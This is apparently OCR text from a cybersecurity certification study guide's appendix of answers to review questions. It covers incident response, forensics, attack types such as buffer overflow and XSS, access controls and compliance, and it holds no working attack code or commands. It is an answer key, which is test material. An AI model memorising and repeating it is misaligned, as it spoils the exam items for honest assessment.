B. Identifying the attacker is typically handled either during the identification stage or as 
part of the post-incident activities. The IR process typically focuses on capturing data and 
allowing later analysis to ensure that services are restored. 


D. Playbooks describe detailed procedures that help to ensure that organizations and 
individuals take the right actions during the stress of an incident. Operations guides typi- 
cally cover normal operational procedures, while an incident response policy describes 
the high-level organizational direction and authority for incident response. An incident 
response program might generate a policy and a playbook but would not include the 
detailed instructions itself. 
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C. This is a simple representation of a buffer overflow attack. The attacker overflows the 
buffer, causing the return address to be pointed to malicious code that the attacker placed 
in memory allocated to the process. 


A. Online tools like VirusTotal, MetaScan, and other online malware scanners use mul- 
tiple antivirus and anti-malware engines to scan files. This means they can quickly iden- 
tify many malware packages. Static analysis of malware code is rarely quick and requires 
specialized knowledge to unpack or de-obsfuscate the files in many cases. Running strings 
can be helpful to quickly pick out text if the code is not encoded in a way that prevents it 
but is not a consistently useful technique. Running local AV or anti-malware can be help- 
ful but has a lower success rate than a multi-engine tool. 


D. DiskView provides a GUI-based view of the disk with each cluster marked by the files 
and directories it contains. du is a command-line disk usage reporting tool that can report 
on the size of directories and their subdirectories. df is the Linux command-line disk 
space usage tool, and GraphDisk was made up for this question. 


D. Passphrases associated with keys are not kept in the .ssh folder. It does contain the 
remote hosts that have been connected to, the public keys associated with those hosts, and 
private keys generated for use connecting to other systems. 


D. There are numerous reverse image search tools, including Google’s reverse image 
search, Tineye, and Bing’s Image Match. John may want to use each of these tools to 
check for matching images. 


C. This image represents an actual situation that involved a severed fiber link. Checking 
the secondary link would show that traffic failed over to the secondary link after a few 
minutes of failed connection attempts. This diagram is not sufficient to determine whether 
Brian has a caching server in place, but normal traffic for streaming services and video 
conferences wouldn’t work via a cache! If the link had failed and the card or device recov- 
ered on the same link, a resumption of normal traffic would appear. PRTG has continued 
to get small amounts of traffic, indicating that it is still receiving some information. 


C. BitLocker keys can be retrieved by analyzing hibernation files or memory dumps or via 
a FireWire attack for mounted drives. The BitLocker key is not stored in the MBR. After 
Alex finishes this investigation, he may want to persuade his organization to require Bit- 
Locker key escrow to make his job easier in the future. 


A. Adam will quickly note that weekends see small drops, but Christmas vacation and 
summer break both see significant drops in overall traffic. He can use this as a baseline to 
identify unexpected traffic during those times or to understand what student and faculty 
behavior mean to his organization’s network usage. 


This detail is not sufficient to determine top talkers, and weekend drops in traffic should 
be expected, rather than requiring him to look into why having fewer people on campus 
results in lower usage! 


C. Slack space is the space left between the end of a file and the end of a cluster. This 
space is left open, but attackers can hide data there, and forensic analysts can recover data 
from this space if larger files were previously stored in the cluster and the space was not 
overwritten prior to reuse. 
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C. The process details are provided using the p flag, while the e flag will show extended 
information that includes the username and inode of the process. The -t flag shows only 
TCP connections, -s shows summary information, -a shows all sockets, and the -n flag 
shows numeric IPs, which is faster than reverse DNS queries. 


B. If the system contains any shutdown scripts or if there are temporary files that would 
be deleted at shutdown, simply pulling the power cable will leave these files in place for 
forensic analysis. Pulling the cord will not create a memory or crash dump, and memory- 
resident malware will be lost at power-off. 


C. If a device is powered on, the SIM should not be removed until after logical collection 
has occurred. Once logical collection has occurred, the device should be turned off, and 
then the SIM card can be removed. If this were not an iPhone, Amanda might want to 
check to ensure that the device is not a dual or multi-SIM device. 


C. Of the tools listed, only OpenVAS is a full system vulnerability scanner. Wapiti is a 
web application scanner, ZAP is an attack proxy used for testing web applications, and 
nmap is a port scanner. 


B. The containment stage of incident response is aimed at limiting damage and preventing 
any further damage from occurring. This may help stop data exfiltration, but the broader 
goal is to prevent all types of damage, including further exploits or compromises. 


B. Logical copies of data and volumes from an unlocked or decrypted device is the most 
likely mobile forensic scenario in many cases. Most forensic examiners do not have 
access to chip-level forensic capabilities that physically remove flash memory from the 
circuit board, and JTAG-level acquisition may involve invasive acquisition techniques like 
directly connecting to chips on a circuit board. 


D. While the registry contains the account creation date and time as well as the last login 
date and time, it does not contain the time the user first logged in. Fortunately for Angela, 
the SAM also contains password expiration information, user account type, the user- 
name, full name, user’s password hint, when the password must be reset and when it will 
fail, as well as if a password is required. The SAM does not include the number of logins 
for a user, but some of this detail may be available in the system logs. 


B. Advanced persistent threats often leverage email, phishing, or a vulnerability to access 
systems and insert malware. Once they have gained a foothold, APT threats typically 
work to gain access to more systems with greater privileges. They gather data and infor- 
mation and then exfiltrate that information while working to hide their activities and 
maintain long-term access. DDoS attacks, worms, and encryption-based extortion are not 
typical APT behaviors. 


A. Alice is performing an information impact analysis. This involves determining 
what data was accessed, if it was exfiltrated, and what impact that loss might have. An 
economic impact analysis looks at the financial impact of an event, downtime analysis 
reviews the time that services and systems will be down, and recovery time analysis 
estimates the time to return to service. 
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D. The process flow that Angela has discovered is typically used by an advanced persis- 
tent threat. Phishing would focus on gaining credentials, whaling is similar but focused on 
important individuals, and a zero-day exploit leverages a newly discovered vulnerability 
before there is a patch or general awareness of the issue. 


B. She is in the identification phase, which involves identifying systems and data before 
they are collected and preserved. 


C. Angela should notify counsel and provide information about the policy and schedule 
that resulted in the data being removed. This will allow counsel to choose what steps to 
take next. 


C. With most e-discovery cases, reviewing the large volumes of data to ensure that only 
needed data is presented and that all necessary data is made available takes up the most 

staff time. Many organizations with larger e-discovery needs either dedicate staff or out- 
source efforts like this. 


C. Cassandra should ensure that she has at least one USB multi-interface drive adapter 
that can connect to both IDE and SATA drives. While most modern drives use a SATA 
interface, analysts still periodically encounter older IDE drives. If she was performing 
forensic analysis, she would also want to use either a hardware or a software write blocker 
to ensure that she retains forensic integrity of the acquisition. A USB C cable, and a USB 
hard drive are commonly found in forensic and incident response toolkits, but won’t help 
Cassandra connect to bare drives. 


B. Crime scene tape isn’t a typical part of a forensic kit if you aren’t a law enforcement 
forensic analyst or officer. Some businesses may use seals or other indicators to discourage 
interference with investigations. Write blockers, label makers, and decryption tools are all 
commonly found in forensic kits used by both commercial and law enforcement staff. 


B. A call list provides a list of the personnel who should or can be contacted during an 
incident or response scenario. Sometimes called an escalation list, they typically include 
the names of the staff members who should be called if there is no response. A rotation 
list or call rotation is used to distribute workload amongst a team, typically by placing a 
specific person on-call for a set timeframe. This may help decide who is on the call list at 
any given point in time. A triage triangle is made up for this question, and responsibility 
matrices are sometimes created to explain who is responsible for what system or applica- 
tion, but aren’t directly used for emergency contact lists. 


A. John the Ripper is a common Linux password cracker. While it is possible that an 
attacker might choose to call a rootkit or a malicious program used for privilege escala- 
tion “john” is it far less likely. Since user processes are identified by the binary name, not 
the user’s identity for the process, a user named John won’t result in a process named John 
unless they create a binary with the same name. 


A. Post incident communication often involves marketing and public relations staff who 
focus on consumer sentiment and improving the organization’s image, while legal often 
reviews statements to limit liability or other issues. Developers are typically not directly 
involved in post incident communications, and are instead working on ensuring the secu- 
rity of the applications or systems they are responsible for. 
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209. A. Malicious sites may run scripts intended to mine cryptocurrency or to perform other 


210. 
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actions when they are visited or ads execute code, resulting in high processor consump- 
tion. Charles should review the sites that were visited and check them against a trusted 
site list tool or a reputation tool. The scenario described does not indicate that checking 
the binary will help, and reinstalling a browser isn’t typically part of the response for high 
CPU usage. Disabling TLS is a terrible idea, and modern CPUs shouldn’t have an issue 
handling secure sites. 


B. Lauren’s organization should use a change management process to avoid unauthorized 
changes to their web server. Lauren could then check the change process logs or audit trail 
to determine who made the change and when. If Java had been installed without proper 
authorization, then this would be unauthorized software. Unexpected input often occurs 
when web applications are attacked, and may result in a memory overflow. 


C. Overflowing a memory location by placing a string longer than the program expect 
into a variable is a form of buffer overflow attack. Attackers may choose to use a string 

of the same letters to make the overflow easier to spot when testing the exploit. Note that 
what the CySA+ exam calls memory overflows are more often called buffer overflows, and 
these terms may be used interchangeably in other materials you may encounter. 


B. Catherine can configure a behavior based analysis tool which can capture and analyze 
normal behavior for her application, then alert her when unexpected behavior occurs. 
While this require initial setup, it requires less long term work than constant manual 
monitoring, and unlike signature based or log analysis based tools, it will typically handle 
unexpected outputs appropriately. 


Chapter 4: Domain 4: Security 
Architecture and Tool Sets 


1. 


A. Pair programming is a real-time technique that places two developers at a workstation 
where one reviews the code that the other writes in real-time. Pass-around reviews, tool- 
assisted reviews, and formal code reviews are asynchronous processes. 


C. The processes consuming the most memory on this server are the SQL Server core pro- 
cess and the SQL Server Management Studio application. These are all components of the 
database service. 


B. The strategy outlined by Jean is one of network segmentation—placing separate func- 
tions on separate networks. She is explicitly not interconnecting the two networks. VPNs 
and VLANs are also technologies that could assist with the goal of protecting sensitive 
information, but they use shared hardware and would not necessarily achieve the level of 
isolation that Jean requires. 


A. This is an ICMP Echo Reply packet, which is a response to a ping request. If Norm 
sees a response to a ping, that means the basic connectivity between the two systems is 
functioning properly. 
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C. The primary control used to limit the length of exposure of compromised passwords 

is a password expiration policy. This policy would force a password change at a defined 
interval and would either lock out the intruder (if the legitimate user changes the password) 
or alert the legitimate user to the compromise (if the intruder changes the password). Pass- 
word history would arguably prevent the future reuse of a compromised password, but this 
is not as direct a control for the given scenario as password expiration. Password length 
and complexity requirements are designed to prevent the compromise of a password and 
are not effective controls once the password has already been compromised. 


C. Angela should not select the password and security questions option since they are 
both examples of knowledge-based factors. Each of the other answers includes different 
factors, providing a greater level of security. 


D. OAuth redirects are an authentication attack that allows an attacker to impersonate 
another user. 


B. The identity provider (IDP) provides the authentication in a SAML-based authentica- 
tion flow. A service provider (SP) provides services to a user, while the user is typically the 
principal. A relying party (RP) leverages an IDP to provide authentication services. 


B. The most practical approach is for Daniel to implement two-factor authentication 

on the account and retain the approval device himself. This allows him to approve each 
request but does not require modifying or re-creating the account for each use. The 
approach where the consultant must advise Daniel before using the account does not meet 
the requirement of Daniel approving each use. 


B. TippingPoint is an intrusion prevention system. Cisco’s NGFW, Palo Alto’s NGFW, 
and CheckPoint’s appliances are all firewall solutions. 


B. The internal network is the most appropriate zone for this server, as it serves only 
internal clients on the data science team. Adding an additional network for this server is 
costly, and there is no indication that the effort and expense would be justified. A data- 
base server should never be placed on the Internet, and there is no public access required, 
which would justify placing it in the DMZ. 


C. The dual firewall approach allows an organization to achieve hardware diversity by 
using firewalls from different vendors. This approach typically increases, rather than 
decreases, both the cost and complexity of administration. There is no indication that the 
proposed design would increase redundancy over the existing environment. 


B. Disposition is a separate SDLC phase that is designed to ensure that data is properly 
purged at the end of an application life cycle. Operations and maintenance activities 
include ongoing vulnerability scans, patching, and regression testing after upgrades. 


B. Internal audit provides the ability to perform the investigation with internal resources, 
which typically reduces cost. External auditors would normally be quite expensive and 
bring a degree of independence that is unnecessary for an internal investigation. The IT 
manager would not be a good candidate for performing the assessment because he may be 
involved in the embezzlement or may have close relationships with the affected employees. 
There is no need to bring in law enforcement at this point, opening the company to unnec- 
essary scrutiny and potential business disruption. 
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B. The Gramm-Leach-Bliley Act (GLBA) includes regulations covering the cybersecurity 
programs at financial institutions, including banks. The Health Insurance Portability and 
Accountability Act (HIPAA) covers healthcare providers, insurers, and health information 
clearinghouses. The Family Educational Rights and Privacy Act (FERPA) applies to edu- 
cational institutions. The Sarbanes-Oxley Act (SOX) applies to publicly traded companies. 


C. The Gramm-Leach-Bliley Act (GLBA) includes regulations covering the cybersecurity 
programs at financial institutions, including banks. The Health Insurance Portability and 
Accountability Act (HIPAA) covers healthcare providers, insurers, and health information 
clearinghouses. The Family Educational Rights and Privacy Act (FERPA) applies to edu- 
cational institutions. The Sarbanes-Oxley Act (SOX) applies to publicly traded companies. 


D. Visitor log reviews are a procedural mechanism that an organization follows to imple- 
ment sound security management practices and, therefore, are an example of an adminis- 
trative control. The other controls listed are all examples of physical security controls. 


B. The ITIL framework places security management into the service design core activity. 
The other processes in service design are design coordination, service catalog manage- 
ment, service-level management, availability management, capacity management, IT 
service continuity management, and supplier management. 


D. Query parameterization, input validation, and data encoding are all ways to prevent 
the database from receiving user-supplied input that injects unwanted commands into 

a SQL query. Logging and intrusion detection are important controls, but they would 
detect, rather than prevent, a SQL injection attack. 


D. The Follow option will allow Alec to follow the TCP stream, reassembling the pay- 
loads from all of the packets in the stream in an easy-to-view manner. 


C. Changes in team members may cause someone to initiate a review, but it is more likely 
that a review would be initiated based upon changes in the processes protected by the 
security program, control requirements (such as compliance obligations), or a control fail- 
ure (such as a security incident). 


C. Bollards are physical barriers designed to prevent vehicles from crossing into an area. 
Mantraps are designed to prevent piggybacking by individuals and would not stop a vehi- 
cle. Security guards and intrusion alarms may detect an intruder but would not be able to 
stop a moving vehicle. 


C. ISO 27001 is the current standard governing cybersecurity requirements. ISO 9000 is 
a series of quality management standards. ISO 17799 covered information security issues 
but is outdated and has been withdrawn. ISO 30170 covers the Ruby programming lan- 


guage. 


C. All of these controls would be effective ways to prevent the loss of information. How- 
ever, only a background investigation is likely to uncover information that might make a 
potential employee susceptible to blackmail. 


B. All of the controls listed are network security controls. Of those listed, a data loss 
prevention system is specifically designed for the purpose of identifying and blocking the 
exfiltration of sensitive information and would be the best control to meet Martin’s goal. 
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Intrusion prevention systems may be able to perform this function on a limited basis, but 
it is not their intent. Intrusion detection systems are even more limited in that they are 
detective controls only and would not prevent the exfiltration of information. Firewalls 
are not designed to serve this purpose. 


A. Full disk encryption prevents anyone who gains possession of a device from accessing 
the data it contains, making it an ideal control to meet Martin’s goal. Strong passwords 
may be bypassed by directly accessing the disk. Cable locks are not effective for devices 
used by travelers. Intrusion prevention systems are technical controls that would not affect 
someone who gained physical access to a device. 


B. The primary risk to Nadine’s organization from this attack is that if the password 
hashes are reversed, accounts may be compromised on Nadine’s site because users com- 
monly use the same passwords on multiple sites. 


A. LDAP directory servers, provisioning engines, and auditing systems are all typically 
considered part of an identity management infrastructure. HR systems are generally con- 
sidered a data source for the identity management infrastructure but not a component of 
the infrastructure itself. 


C. There is no explicit security domain in the COBIT standard. The four COBIT domains 
are Plan and Organize, Acquire and Implement, Deliver and Support, and Monitor and 
Evaluate. 


C. NT LAN Manager (NTLM) version 1 contains serious vulnerabilities and exposes 
hashed passwords to compromise. LDAPS is an encrypted, secure version of the Light- 
weight Directory Access Protocol (LDAP). Active Directory Federation Services (ADFS) 
and Kerberos are both secure components of Active Directory. 


B. Fuzz testing works by dynamically manipulating input to an application in an effort to 
induce a flaw. This technique is useful in detecting places where an application does not 
perform proper input validation. 


A. The situation where a user retains unnecessary permissions from a previous role is 
known as privilege creep. Privilege creep is a violation of the principle of least privilege 
(rather than an example of least privilege) and may also be a violation of separation of 
duties, depending upon the specific privileges involved. Security through obscurity occurs 
when the security of a control depends upon the secrecy of its details, which is not the 
case in this example. 


B. Patches should be applied in test environments prior to deploying them in production. 
It is best practice to apply security patches as soon as possible and test them thoroughly. 
Patches should also be applied through the organization’s normal change management 
process. 


A. The use of very long query strings points to a buffer overflow attack that was used 
to compromise a local application to perform privilege escalation. The use of the sudo 
command confirms the elevated privileges after the buffer overflow attack. Phishing, 
social engineering, and session hijacking are all possible ways that the attacker compro- 
mised the janitor’s account originally, but there is no evidence pointing at any of these 
in particular. 
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A. Network firewalls are not likely to be effective against social engineering attacks 
because they are designed to allow legitimate traffic, and attackers waging social engineer- 
ing attacks typically steal the credentials of legitimate users who would have authorized 
access through the firewall. Multifactor authentication is an effective defense because it 
requires an additional layer of authentication on top of passwords, which may be stolen 

in social engineering. Security awareness raises social engineering in users’ consciousness 
and makes them less susceptible to attack. Content filtering may block phishing messages 
from entering the organization and may block users from accessing phishing websites. 


C. The classification levels under the U.S. government information classification scheme 
are, in ascending order, Confidential, Secret, and Top Secret. Private is not a government 
classification. 


D. The Open Web Application Security Project (OWASP) provides developer-friendly 
descriptions of the top web application security issues. The Common Vulnerability Enu- 
meration (CVE), Common Platform Enumeration (CPE), and Common Configuration 
Enumeration (CCE) tools provide a taxonomy for describing vulnerabilities, platforms, 
and configurations, but they are not educational tools and do not focus on web applica- 
tion security. 


D. By default, nmap scans all of the low-numbered ports (1-1024) and those that are 
specifically listed in the nmap-services file. 


A. PCI DSS has a fairly short minimum password length requirement. Requirement 8.2.3 
states that passwords must be a minimum of seven characters long and must include a 
mixture of alphabetic and numeric characters. 


D. Mandatory vacations are designed to force individuals to take time away from the 
office to allow fraudulent activity to come to light in their absence. The other controls 
listed here (separation of duties, least privilege, and dual control) are all designed to 
prevent, rather than detect, fraud. 


C. The most likely reason that an employee would be storing cookies is to use the session 
IDs stored in those cookies to engage in a session hijacking attack, allowing him to imper- 
sonate the user and conduct financial transactions. 


B. This situation violates the principle of separation of duties. The company appears to 
have designed the controls to separate the creation of vendors from the issuance of pay- 
ments, which is a good fraud-reduction practice. However, the fact that they are cross- 

trained to back each other up means that they have the permissions assigned to violate 

this principle. 


B. All of the technologies listed in this question may be used during the evidence collec- 
tion and production process. However, the hash function is the only component that may 
be used to demonstrate the integrity of the evidence that Arnie collected. 


A. The Data Encryption Standard (DES) is an outdated encryption algorithm that should 
not be used for secure applications. The Advanced Encryption Standard (AES), Rivest- 
Shamir-Adelman (RSA), and Elliptic Curve Cryptosystem (ECC) are all secure alternatives. 
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A. Tammy can correlate the results of vulnerability scans with her IPS alerts to deter- 
mine whether the systems targeted in attacks against her network are vulnerable to the 
attempted exploits. IDS logs would contain redundant, rather than correlated, informa- 
tion. Firewall rules and port scans may provide some useful information when correlated 
with IPS alerts, but the results of vulnerability scans would provide similar information 
enhanced with the actual vulnerabilities on particular systems. 


C. In the SABSA model, the Designer’s view corresponds to the logical security architec- 
ture layer. The Builder’s view corresponds to the physical security architecture. The Archi- 
tect’s view corresponds to the conceptual security architecture layer. The Tradesman’s 
view corresponds to the component security architecture layer. 


A. Automated deprovisioning ties user account removal to human resources systems. 
Once a user is terminated in the human resources system, the identity and access manage- 
ment infrastructure automatically removes the account. Quarterly user access reviews may 
identify accounts that should have been disabled, but they would take a long time to do 
so, so they are not the best solution to the problem. Separation of duties and two-person 
control are designed to limit the authority of a user account and would not remove access. 


C. Annual reviews of security policies are an industry standard and are sufficient unless 
there are special circumstances, such as a new policy or major changes in the environ- 
ment. Monthly or quarterly reviews would occur too frequently, while waiting five years 
for the review is likely to miss important changes in the environment. 


C. The image is a dashboard from AlienVault, a security information and event manage- 
ment (SIEM) solution. SIEMs correlate security information gathered from other sources 
and provide a centralized analysis interface. 


B. This scenario has all of the hallmarks of a cross-site scripting attack. The most likely 
case is that the site allows users to post messages containing HTML code and that it does 
not perform input validation to remove scripts from that code. The attacker is likely using 
a script to create a pop-up window that collects passwords and then using that informa- 
tion to compromise accounts. 


A. The only error in this rule is the protocol. SMTP does run on port 25, and inbound 
connections should be accepted from any port and IP address. The destination IP address 
(10.15.1.1) is correct. However, SMTP uses the TCP transport protocol, not UDP. 


B. Travis can correct this error by switching the positions of rules 2 and 3. Rule 3, which 
permits access from the 10.20.0.0/16 subnet, will never be triggered because any traffic 
from that subnet also matches rule 2, which blocks it. 


D. Rule 4 is correctly designed to allow SSH access from external networks to the server 
located at 10.15.1.3. The error is not with the firewall rulebase, and Travis should search 
for other causes. 


A. Managed security service providers (MSSPs) provide security as a service (SECaaS). 
The infrastructure as a service (IaaS), platform as a service (PaaS), and software as a ser- 
vice (SaaS) offerings do not include the managed security offering that Carl seeks. 


D. It is sometimes difficult to distinguish between cases of least privilege, separation of 
duties, and dual control. Least privilege means that an employee should only have the 
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access rights necessary to perform their job. That is not the case in this scenario because 
accountants need to be able to approve payments. Separation of duties occurs when the 
same employee does not have permission to perform two different actions that, when 
combined, could undermine security. That is not the case here because both employees 
are performing the same action: approving the payment. Dual control occurs when two 
employees must jointly authorize the same action. That is the case in this scenario. Secu- 
rity through obscurity occurs when the security of a control depends upon the secrecy of 
its mechanism. 


B. Load testing, also known as stress testing, places an application under a high load 
using simulated users. This type of testing would most closely approximate the type of 
activity that might occur during a denial-of-service attack. 


B. Burp is a web interception proxy, not an intrusion prevention system. Snort, Source- 
fire, and Bro are all intrusion detection and prevention systems. 


A. The ESTABLISHED status message indicates that a connection is active between two 
systems. LISTENING indicates that a system is waiting for a connection. LAST_ACK and 
CLOSE_WAIT are two status messages that appear in different stages of closing a connec- 
tion. 


A. These results show an active network path between Greg’s system and the CompTIA 
web server. The asterisks in the intermediate results do not indicate a network failure but 
are a common occurrence when intermediate nodes are not configured to respond to 
traceroute requests. 


B. The certificate issuer is responsible for signing the digital certificate. In this case, the 
issuer, as shown in the certificate, is Amazon. Starfield Services is the root CA, meaning 
that it issued the certificate to Amazon and allows it to issue certificates to end users. 
nd.edu is the subject of the certificate, while RSA is an encryption algorithm used in the 
certificate. 


C. This is a wildcard certificate, meaning that it is valid for the subject domain (nd. edu) 
as well as any subdomains of that domain (e.g., www.nd. edu). It would not, however, be 
valid for subsubdomains. A wildcard certificate for *.business.nd.edu would cover 
www. business.nd. edu. 


A. The purpose of a digital certificate is to provide the subject’s public key to the world. 
In this case, the subject is the nd. edu website (as well as subdomains of nd. edu), and the 
certificate presents that site’s public key. 


D. TLS uses public key cryptography to initiate an encrypted connection but then 
switches to symmetric cryptography for the communication that takes place during the 
session. The key used for this communication is known as the session key or the 
ephemeral key. 


D. The symmetric algorithm used to communicate between the client and server is negoti- 
ated during the TLS session establishment. This information is not contained in the digital 
certificate. 
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A. Group Policy objects (GPOs) are used to enforce security and configuration require- 
ments within Active Directory. Active Directory forests and organizational units (OUs) 
are designed to organize systems and users hierarchically and do not directly allow 
security configurations, although GPOs may be applied to them. Domain controllers 
(DCs) are the servers that are responsible for providing Active Directory services to the 
organization and would be the point for applying and enforcing the GPO. 


A. Succession planning is designed to create a pool of reserve candidates ready to step 
into positions when a vacancy occurs. This is an important continuity control. The other 
security controls may have the incidental side effect of exposing employees to other 
responsibilities, but they are not designed to meet this goal. 


B. Bro is an open source intrusion detection and prevention system. Sourcefire is a com- 
mercial company associated with the Snort IDS, but Sourcefire is not itself an open source 
product. TippingPoint and Proventia are IDS/IPS solutions from HP and IBM, respectively. 


B. Load testing, or stress testing, evaluates an application’s performance under full load 
conditions. It is the best type of testing to meet John’s requirements, as the other test types 
do not simulate a high-demand situation. 


B. Security artifacts created during the design phase include security architecture docu- 
mentation and data flow diagrams. 


C. Requests for an exception to a security policy would not normally include a proposed 
revision to the policy. Exceptions are documented variances from the policy because of 
specific technical and/or business requirements. They do not alter the original policy, 
which remains in force for systems not covered by the exception. 


D. While all the COBIT components are useful to an organization seeking to implement 
the COBIT framework, only the maturity models offer an assessment tool that helps the 
organization assess its progress. 


D. Account management policies describe the account life cycle from provisioning 
through active use and decommissioning, including removing access upon termination. 
Data ownership policies clearly state the ownership of information created or used by the 
organization. Data classification policies describe the classification structure used by 

the organization and the process used to properly assign classifications to data. Data 
retention policies outline what information the organization will maintain and the length 
of time different categories of information will be retained prior to destruction. 


A. The Health Insurance Portability and Accountability Act (HIPAA) covers the han- 
dling of protected health information (PHI) by healthcare providers, insurers, and health 
information clearinghouses. The Gramm-Leach-Bliley Act (GLBA) includes regulations 
covering the cybersecurity programs at financial institutions, including banks. The Fam- 
ily Educational Rights and Privacy Act (FERPA) applies to educational institutions. The 
Sarbanes-Oxley Act (SOX) applies to publicly traded companies. 


B. Separation of duties is a principle that prevents individuals from having two different 
privileges that, when combined, could be misused. Separating the ability to create vendors 
and authorize payments is an example of two-person control. 
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D. Two-person control is a principle that requires the concurrence of two different 
employees to perform a single sensitive action. Requiring two signatures on a check is an 
example of a two-person control. 


B. Mandatory vacations and job rotation plans are able to detect malfeasance by requir- 
ing an employee’s absence from his or her normal duties and exposing them to other 
employees. Privilege use reviews have a manager review the actions of an employee with 
privileged system access and would detect misuse of those privileges. Background investi- 
gations uncover past acts and would not be helpful in detecting active fraud. They are also 
typically performed only for new hires. 


C. The tracert (or traceroute) command identifies the path of packet flow between 
two systems over a network. It would help Johann identify potential trouble points requir- 
ing further investigation. 


A. The netstat results show an active SSH connection on the server, as well as several 
active HTTP connections. The server is listening for HTTPS, MySQL, and NTP connec- 
tions, but there are no active sessions. 


A. Web proxy servers actually increase the speed of loading web pages by creating local 
caches of those pages, preventing repeated trips out to remote Internet servers. For this 
same reason, they reduce network traffic. Web proxies may also serve as content filters, 
blocking both malicious traffic and traffic that violates content policies. 


A. This is an example of dual control (or two-person control) where performing a sensi- 
tive action (logging onto the payment system) requires the cooperation of two individuals. 
Separation of duties is related but would involve not allowing the same person to perform 
two actions that, when combined, could be harmful. 


C. Analyzing these dig results, you see that the DNS server (identified in the SERVER line) 
is 172.30.25.8. 198.134.5.6 is the query response, indicating that it is the CompTIA.org 
web server. The AUTHORITY value in this result is 0, indicating that the DNS server is not 
authoritative for the CompTIA. org domain. 


D. Kerberos is the only answer that provides automatic protection for authentication 
traffic. TACACS is outdated, and TACACS+ is considered unsafe in most circumstances, 
meaning that it should be used on secure networks only if it must be used. RADIUS can 
be secured but is not secure by default. 


D. The AccessEnum tool enumerates system access. It provides a view of who has permis- 
sions to files, directories, and other objects. AutoRuns shows what programs start at login 
or system boot. SDelete is a secure file deletion utility. Sysmon allows administrators to 
monitor processes and their activity in a searchable manner. 


D. While OAuth may be paired with almost any authentication provider, the most com- 
mon approach is to pair OAuth and OpenID Connect to provide a complete authentica- 
tion and authorization solution. 


A. Business architecture defines governance and organization and explains the interaction 
between enterprise architecture and business strategy. Applications architecture includes 


386 


86. 


87. 


88. 


89. 


90. 


91. 


92. 


93. 


94. 


Appendix = Answers to Review Questions 


the applications and systems that an organization deploys, the interactions between those 
systems, and their relation to business processes. Data architecture provides the orga- 
nization’s approach to storing and managing information assets. Technical architecture 
describes the infrastructure needed to support the other architectural domains. 


B. The test environment contains a complete version of the code, as the developers intend 
to release it. This is the best place to conduct rigorous testing, such as security analysis. 
The development environment is constantly in a state of flux and not a good environment 
for formalized testing. Code should be released to production only when it is ready for 
use by clients, and security testing should take place before code is placed in a production 
environment. Staging environments are holding areas used as part of the code release 
process. 


A. The Open Web Application Security Project (OWASP) maintains a listing of com- 
mon application vulnerabilities. The SANS Institute maintained a similar list but stopped 
updating it in 2011. Microsoft and Google do not publish a similar list. 


D. OSSIM is an open source SIEM made by AlienVault. It is capable of pulling together 
information from a wide variety of open source security tools. QRadar, ArcSight, and 
AlienVault are all examples of commercial SIEM solutions. 


A. Static analysis of code involves manual or automated techniques that review the source 
code without executing it. Fuzzing and fault injection are examples of dynamic analysis 
that execute the code and attempt to induce flaws. 


C. Of the choices listed, only the combination of an ID badge and PIN is a multifac- 

tor solution. ID badges are “something you have,” and a PIN is “something you know.” 
Passwords, PINs, and security question answers are all “something you know” factors, so 
combining them does not create multifactor authentication. Fingerprints and retinal scans 
are both examples of “something you are.” 


C. In the SABSA model, the Builder’s view corresponds to the physical security archi- 
tecture. The Designer’s view corresponds to the logical security architecture layer. The 
Architect’s view corresponds to the conceptual security architecture layer. The Trades- 
man’s view corresponds to the component security architecture layer. 


B. The AccessEnum tool provides a view into which users and groups have permissions to 
read and modify files, directories, and registry entries. Sysmon and ProcDump are process 
monitoring tools that do not provide insight into the registry. AutoRuns provides a listing of 
the programs that start automatically when a system boots or a user logs into the system. 


D. In this situation, the best case for Amy would be to delegate management of the indi- 
vidual user accounts to the vendor. Amy should avoid a situation where she must create 
the individual accounts to reduce the burden on her. Using a single account violates many 
principles of security and eliminates accountability for individual user actions. If Amy 
implements the delegated account approach, she may want to supplement it with auditing 
to verify that accounts are properly managed. 


C. The TOGAF Architecture Development Model is centered on requirements. The 
requirements inform each of the other phases of the model. 
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B. LDAP injection attacks use improperly filtered user input via web applications to send 
arbitrary LDAP queries to directory servers. SASL is a password storage scheme for direc- 
tory services, but there is no attack type known as SASL skimming. Man-in-the-middle 
attacks may be used against directory servers, but they are not specific to directory envi- 
ronments. Cross-site scripting (XSS) attacks are waged against web servers. 


C. The Microsoft Baseline Security Analyzer (MBSA) works only with Microsoft operat- 
ing systems. The other products listed are all capable of scanning systems running any 
operating system. 


A. This activity is almost certainly a violation of the organization’s acceptable use policy, 
which should contain provisions describing appropriate use of networks and computing 
resources belonging to the organization. 


A. The type of tool that Brenda seeks is known as a fuzzer. The Peach Fuzzer is a solution 
that meets these requirements. Burp and ZAP are interception proxies. ModSecurity is a 
web application firewall tool. 


D. ZAP, Vega, and Burp are all interception proxies useful for the penetration testing of 
web applications. Snort is an intrusion detection system and does not have this capability. 


A. The NIST Cybersecurity Framework uses four implementation tiers to describe an 
organization’s progress toward achieving cybersecurity objectives. The first stage, tier 1, is 
Partial. This is followed by the Risk Informed, Repeatable, and Adaptive tiers. 


C. While all of these tools may have the ability to perform forensic analysis on mobile 
devices, Cellebrite is a purpose-built tool designed specifically for mobile forensics. 


A. The rapid application development (RAD) approach uses an iterative approach to 
software development that generates a series of evolving prototypes in each phase. 


C. Organizations may require all of these items as part of an approved exception request. 
However, the documentation of scope, duration of the exception, and business justifica- 
tion are designed to clearly describe and substantiate the exception request. The compen- 
sating control, on the other hand, is designed to ensure that the organization meets the 
intent and rigor of the original requirement. 


A. All of the tools listed would allow Crystal to modify session values. However, of these 
tools, only Tamper Data is a browser plug-in. It works within the Firefox browser and 
allows the user to modify session data before it is submitted to a web server. 


C. This is an example of separation of duties. Someone who has the ability to transfer 
funds into the account and issue payments could initiate a very large fund transfer, so 
Berta has separated these responsibilities into different roles. Separation of duties goes 
beyond least privilege by intentionally changing jobs to minimize the access that an indi- 
vidual has, rather than granting them the full permissions necessary to perform their job. 
This is not an example of dual control because each action may still be performed by a 
single individual. 
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106. A. User training is the most effective control against phishing attacks, as it encourages 
users to recognize and avoid phishing messages. An intrusion detection system may notice 
an attack taking place but cannot take action to prevent it. Application blacklisting would 
only work against ransomware if it were already known and included on the blacklist, 
which is not likely. Social engineering is an attack type, rather than a control. 


107. A. The ifconfig command displays information about network interfaces on a Linux 
system. The ipconfig command displays similar information on Windows systems. 
tcpdump is a packet capture tool and iptables is a Linux firewall. 


108. C. FTK, EnCase, and Helix are all commercial forensic toolkits. The SANS Investigative 
Forensics Toolkit (SIFT) is an Ubuntu-based set of open source forensics tools. 


109. D. The nodes in the diagram exist between domain component (dc) and common name 
